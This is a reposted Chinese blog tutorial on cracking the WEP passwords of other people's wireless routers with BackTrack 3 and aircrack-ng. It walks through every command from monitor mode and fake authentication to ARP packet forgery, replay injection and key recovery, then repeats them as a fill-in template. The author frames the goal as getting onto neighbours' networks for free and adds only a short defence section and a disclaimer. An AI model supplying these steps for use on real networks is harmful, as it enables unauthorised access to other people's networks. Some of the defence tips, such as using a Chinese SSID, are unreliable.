转自:http://www.blogjava.net/fanyingjie/archive/2009/12/01/304347.html
最近很多人问我怎么破解WiFi密码…看来大家都对免费的东西比较有兴趣。要么也可能是我太招摇了…囧…
好吧,我就写篇小小的教程,看完后,你应该能够破解大部分无线路由器密码了,写这个教程也是为了加强大家对无线网络安全性的重视,后面也有简单的防破解的办法。
好了,正式开始。
首先,你需要的工具:
软件:
①
BackTrack 3
(简称
BT3
)
BT3
有光盘版,硬盘版还有
U
盘版,由于本本基本上可以刻碟,我就懒得弄那些
U
盘版,
硬盘版了,直接刻了张碟,所以这篇教程使用光盘版。
下载地址:
U
盘版:
http://backtrack.unixheads.org/bt3final_usb.iso
光盘版:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd
硬件:
②
一台笔记本,或者台式机配无线网卡。
如果是笔记本,在设备管理器中查看一下你的网卡类型,我的是Intel 3945ABG的,现在市面上大部分笔记本都是用的这个网卡,所以,这篇教程主要针对这个网卡,如果不是,可能也能够破解成功,我也就没有测试了,台式机用的无线网卡同理,也有支持BT3的。
图01-查看网卡
③
其余瓜子,饮料什么的自备。
关于前面的准备部分,网上很多教程都解释得很详细了,我也没做过关于U盘版或者硬盘版,所以这部分跳过…有问题的在下面留言。
插入光盘开机等待几分钟,有个选择模式的界面,一般选择第一个就会进入BT3的图形界面,如图02,如果不能进去,输入账号root,密码toor,然后输入startx,也可以进去,但是我测试过,我的本本进不去,网上找到的答案是显卡不支持(ATI 2400 XT)
进不去第一个的尝试选择第四个图形模式,我的可以进去,如果这个也进不去,那就每个图形模式都试试,都不行的话,那就是RP问题了,你的本本显卡不支持…
图02-进入后界面
然后点右下角的一个黑黑的显示器一样的图标打开一个控制台,如图03:
图03-打开控制台
这时候可以开始输入命令了。
①
ifconfig -a
这
是查看当前网卡信息的,-a是显示全部网卡,如果没有这个参数,就无法显示出无线网卡。这条命令可以查看当前网卡的MAC地址,其中,无线网卡的MAC地
址是我们需要的,就在HWaddr后面的6个16进制字符,后面的那么多00是不要的,应该是为了IP6做准备的。如图04。
图04-查看网卡信息
为了避免信息泄露,我把我的MAC地址和要破解的AP(Access Point,接入点)的MAC地址的后2个字节都隐藏了~呵呵~
可以看到,现在的无线网卡名称是wlan0,这是BT3自动加载的iwl3945驱动起的名字,而这个驱动是不支持之后的破解工作的,所以我们需要换个驱动。
②
modprobe -r iwl3945
卸载当前iwl3945驱动。
③
modprobe ipwraw
加载ipwraw驱动,这个驱动是可以正常使用的。
加
载之后再输入ifconfig
–a试试,就会发现wlan0不见了,出来了个wifi0,如图05,这就是ipwraw给我们的网卡起的名字。这个名字之后会多次用到。这时候也需要把
自己的MAC地址记住,最好是在桌面新建一个文本文件,然后复制进去,方便之后的命令调用。
图05-加载3945驱动
④
airomon-ng start wifi0
这条命令是设置无线网卡为监听模式,因为Windows下这个很难实现,而Linux由于开源,所以大部分黑客软件都是Linux平台下的,我刚开始用BT3的时候就因为iwl3945驱动不能使用监听模式而卡在这里了。设置成功后,如图06。
图06-设置监听模式
⑤
airodump-ng wifi0
既然要破解,那么总得有目标吧,这条命令就是检测当前所能搜索到的所有无线网络信号。其中包括频道,信号强度等信息。运行后如图07。
图07-查看存在AP
里面的几个参数,解释一下,网上也有解释的,但是解释得不太清楚。
BSSID——这个就是路由器的MAC地址了,我要破解的是下面那个,上面那个信号太差。
PWR——这个是信号强度,但是我的电脑显示不出来,显示不出来也没关系,不妨碍之后的破解的,只要在Windows中显示信号很好就可以了。
Beacons——这个是路由器对外发包,可能是SSID广播,我也不太清楚,如果看到这个数据在涨,就代表这个AP还行,一般是1秒涨20~30吧。太慢了就有可能因为信号的原因破解失败。
#Data——这个数据最最重要,这个代表可以用于破解的包,一般这个数据到达1W+,一般的64位的WEP密码就能够破解了。之后我们要做的,就是等待他到达1W,如果数据增长很缓慢(几分钟才增加1),那就只好用另一种方法了,就是发包攻击,这个在后面有介绍。
#/s——DATA增加的速度。
CH——频道,总共有11个频道,可以看到,我要破解的AP的频道是11。
MB——无线的速度,现在一般都是54MB的了。
CIPHER
——加密方式,如果是WEP,就能够用这样的方式破解,如果是WPA/WPA2,目前就只能暴力破解了,话说我现在还不知道怎么暴力破解…等你破解出来的
密码都是12345,1234567890之类的密码时,你就会觉得自己付出的和得到的完全不成比例…TAT。在这里我们只考虑WEP加密的情况。
AUTH——这个应该是
authorization
的缩写,也就是
授权的意思,我也不明白这个有什么用。可能路由器要给客户端发包,就需要验证客户端权限。现在这里是空的,之后会有值的。
ESSID——简单理解,这个就是路由器的名字了。
这一步,我们要做的就是确定需要破解的路由器和它的MAC地址,DATA值增长速度比较快,或者在Windows下信号比较好,或者PWR比较高的,优先。同样,可以把MAC地址写到文本文件中去。
⑥
airodump-ng --ivs -w god -c 11 wifi0
这个命令是检测某个频道的路由器发包,并且保存可用包(也就是#DATA)到一个文件god,这个god是可以改成你喜欢的名字的,但是自己要记住…
参数中,
-c是指频道,后面跟着我要破解的路由器的信号频道,也就是11。
wifi0是我的网卡名称。
输入完这个命令后,这个窗口就不用关了,它要一直抓包的,我们称之为1号窗口。
这时候我们重新打开一个控制台,也就是黑框框。输入之后的命令:
⑦
aireplay-ng -1 0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0
-a后面跟着的是目标MAC地址。
-h后面跟着的是本机的无线网卡MAC地址。
wifi0是本机无线网卡名称
这条命令是获取授权,测试模拟发包攻击,具体有什么用,我不太清楚… 可能是测试能否通过发包进行攻击吧。
成功后会出现如下信息:Association successful :-)
然后上面那个窗口中AUTH栏值变成OPN。
图08-测试连接
⑧
aireplay-ng -5 -b 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0
参数中
-5是aireplay这个程序使用的模式,无需深究。
-b后面跟着的是目标MAC地址。
-h后面跟着的是本机的无线网卡MAC地址。
wifi0是本机无线网卡名称
这
个命令,我的理解是是获取到一个特定的包制作攻击源,然后可以用这个攻击源进行发包攻击。这一步是最难成功的,往往失败就是因为这一步。如果你选择的AP
等了半天DATA值还是0,可以放弃那个了。输入命令后,就开始抓包了,下面的数据会涨,如图09,等抓到一个有用的包的时候,它会问你是否用这个包,如
图10,按Y,然后回车就OK。
但是往往获取到的包都是攻击失败的,如图11,这样就只好继续等了,它会自动开始下一轮抓包的,所以,破解也是需要RP的…RP低的兄弟姐妹还是飘走吧……
图09-获取可用包
图10-获取到可用包
图11-攻击失败
再
说说DATA值为什么会保持在0或者增长缓慢。如果这个AP是有客户端无线连接的,那么它发的数据就多,获取到可用包的几率就大。如果没客户端连接,它做
的工作就是不断向外发送SSID广播,简单说就是告诉大家,我是一个路由器,我的名字是****,我的信号有多大,我有没有密码等等。这样的包,可用来破
解密码的(也就是DATA包)是凤毛麟角啊,一般5000个包能出一个都算不错了…
在等待的过程中,可以打开另一个窗口,输入第9条命令
⑨
aircrack-ng -b 00:23:CD:89:**:** god-01.ivs
参数中
-b后面跟着的是目标MAC地址。
这个就是正式破解了,其中god-01.ivs是我们抓的数据包,也就是DATA包保存成的文件,如果你多次使用airodump抓包,那么你可以去root目录看看最新生成的文件名,然后相应变更。这个程序就用这些抓到的DATA包来计算出密码。运行命令后如图12。
图12-尝试破解失败
可以看到破解失败了。只有34个IVs(DATA包),不失败才怪呢,之前说过一般要1W+才可以的。
第2个窗口中,等啊等,终于等到一个有用的包了,成功信息如图13
图13-获取到可用于攻击的包
成功后程序会生成一个xor文件fragment-0806-150830.xor,记住这个就好,下一条命令要用。
接着输入:
⑩
packetforge-ng
-0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** -k 255.255.255.255 –l
255.255.255.255 -y fragment-0806-150830.xor -w moon
参数中
-a后面跟着的是目标MAC地址。
-h后面跟着本地无线网卡MAC地址。
-y是上一步中生成的那个xor文件
-w是生成的ARP包文件名,我填了moon,可更改,也要记住。
这个命令是伪造ARP包,用于ARP攻击。
最后一条命令,就让路由器做临死前的挣扎吧…
⑪
aireplay-ng -2 -r moon -x 512 wifi0
moon是上一步保存的ARP包文件名。
512是攻击线程,一般512够了,1024我怕大了,没敢弄。
wifi0是网卡名称。
输入完这一条,就可以看到第1个窗口中的DATA值暴增,如图14。
图14-发包攻击
图上可以看到,DATA的增长速度是361个/s。
然后我们就切换到第3个窗口,就是aircrack那个窗口看看吧,等DATA到了5000,就会自动开始 破解,如果没成功,DATA到达10000又会破解一次。这一切都发生地很迅速。
很快,密码出来了,如图15。
图15-破解成功
从图15可以看到,密码就是8264287788。由于WEP中64位加密是5个ASCII码或者10个16进制字符,所以,我们可以切换Windows,然后用8264287788连接上去,如图16,信号很好哦!
图16-无线连接
【总结】
把所有用到的命令都总结一下,[]内的是需要更改的,方便大家对照修改。
①
ifconfig –a
②
modprobe -r iwl3945
③
modprobe ipwraw
④
airomon-ng start [
网卡名]
⑤
airodump-ng [
网卡名]
⑥
airodump-ng --ivs -w [DATA
包文件名] -c [频道] [网卡名]
⑦
aireplay-ng -1 0 -a [
目标MAC] -h [网卡MAC] [网卡名]
⑧
aireplay-ng -5 -b [
目标MAC] -h [网卡MAC] [网卡名]
⑨
aircrack-ng -b [
目标MAC] [DATA包文件名]-0*.ivs
⑩
packetforge-ng -0 -a [
目标MAC] -h [网卡MAC] -k 255.255.255.255 –l 255.255.255.255 -y [上一步的xor文件名] -w [攻击包文件名]
⑪
aireplay-ng -2 -r [
攻击包文件名] -x [攻击线程] [网卡名]
在本教程中:
[网卡名] ——wifi0
[DATA包文件名]——god
[频道]——11
[目标MAC]——00:23:CD:89:**:**
[网卡MAC]——00-1F-3C-5B-**-**
[上一步的xor文件名]——fragment-0806-150830.xor
[攻击包文件名]——moon
[攻击线程]——512
然后说说怎么样防范自己的AP被像我这样的不速之客破解然后蹭网吧。
①
你可以关闭SSID广播,这样别人就搜索不到你的无线信号了。
②
你可以设置WPA/WPA2加密,现在主流的路由器都支持这个功能,为什么不用呢?
③
你可以把你的SSID改成中文,虽然我没试过,但是网上貌似说这样就不可以破解了。
④
你可以设置MAC地址绑定,但是可以查看合法MAC并伪装MAC的方式破解(感谢楼下兄弟提供建议~)
至此,教程就结束了,有什么问题,可以跟帖问。
我也是个菜鸟,这篇教程也是东拼西凑,再加上自己的一些见解弄出来的,难免有不对的地方,欢迎指正~
最后,我和谐地宣布:
本教程旨在普及无线网络知识,加强大家对无线网络安全问题的认识,希望大家不要拿来做坏事哦~用这个方法造成的一切后果自负,我概不负责。嘿嘿~
相关推荐
Intel3945ABG无线网卡破解无线路由器密码BT3.pdf
Intel_3945ABG无线网卡破解无线路由器密码分享.pdf
Intel_3945ABG无线网卡破解无线路由器密码整理.pdf
Intel_3945ABG无线网卡破解无线路由器密码定义.pdf
Intel 3945abg网卡在Q3下成功破解wep无线密码 Intel 3945abg网卡在Q3下成功破解wep无线密码
Intel英特尔无线网卡型号参数列表 型号 2100B 2200BG 2915ABG 3945BG 3945ABG 4965AG 4965AGN 5100AG 5100AGN 5300AGN 6300AGN N100 N105 N5150 N6150 N6200 N6205 N6250 N130 N135 N1030 N...
Intel英特尔WiFi Link 3945ABG/4965AGN/5100 AGN/5300 AGN/5150/5350/6200/6250/6300系列无线网卡驱动13.3.0.137官方正式版For Win7-64(2010年9月20日发布)日前,Intel方面对旗下的无线网卡驱动进行了更新升级,...
intel PRO/Wireless 2200BG/2915ABG/3945ABG/4965AGN无线网卡驱动11.5.0.32 intel 旧无线网卡驱动 Marvell无线网卡驱动 Netgear无线网卡驱动 PRISM无线网卡驱动 RaLink无线网卡驱动 Realtek 8180/8185/8187/8187_USB...
Intel3945ABG在BT3下研究学习有(无)客户端wep简明教程,945芯片组本子大多是intel 3945 无线网卡,可按此教程实习,实战。
intel PRO/Wireless 2200BG/2915ABG/3945ABG/4965AGN无线网卡驱动11.5.0.32 intel 旧无线网卡驱动 Marvell无线网卡驱动 Netgear无线网卡驱动 PRISM无线网卡驱动 RaLink无线网卡驱动 Realtek 8180/8185/8187/8187_USB...
intel PRO/Wireless 2200BG/2915ABG/3945ABG/4965AGN无线网卡驱动11.5.0.32 intel 旧无线网卡驱动 Marvell无线网卡驱动 Netgear无线网卡驱动 PRISM无线网卡驱动 RaLink无线网卡驱动 Realtek 8180/8185/8187/...
Intel英特尔PRO/Wireless 2200BG/PRO Wireless 2915ABG/PRO Wireless 3945ABG无线笔记本网卡最新驱动包10.1.1.3版For Win2000/XP(2006年5月8日发布)Intel PRO/Wireless系列无线网卡是英特尔迅驰移动技术中一项重要...
-d 后跟网卡,在这里为笔记本上常见的内置Intel 3945ABG无线网卡,输入y确定。 步骤3:下面,打开airodump-ng进行无线抓包,命令如下: airodump-ng -w x.cap 127.0.0.1:666 其中: -w 后跟捕获的Cap数据包文件 ...
-d 后跟网卡,在这里为笔记本上常见的内置Intel 3945ABG无线网卡,输入y确定。 步骤3:下面,打开airodump-ng进行无线抓包,命令如下: airodump-ng -w x.cap 127.0.0.1:666 其中: -w 后跟捕获的Cap数据包文件 ...
Intel 3945ABG无线网卡 抓取数据包,破解无线局域网密码的必备软件
Intel(R) PRO 无线 3945ABG 网络连接_12.4.1.4.zip
Intel? PRO/Wireless Drivers-Only for Windows* XP (6868KB) 11.5.0.32/9.0.4.37 11/7/2007
http://blog.csdn.net/zfpnuc/archive/2010/07/24/5759142.aspx WIN7下Intel 3945ABG无线网卡修改MAC地址通过校园网H3C认证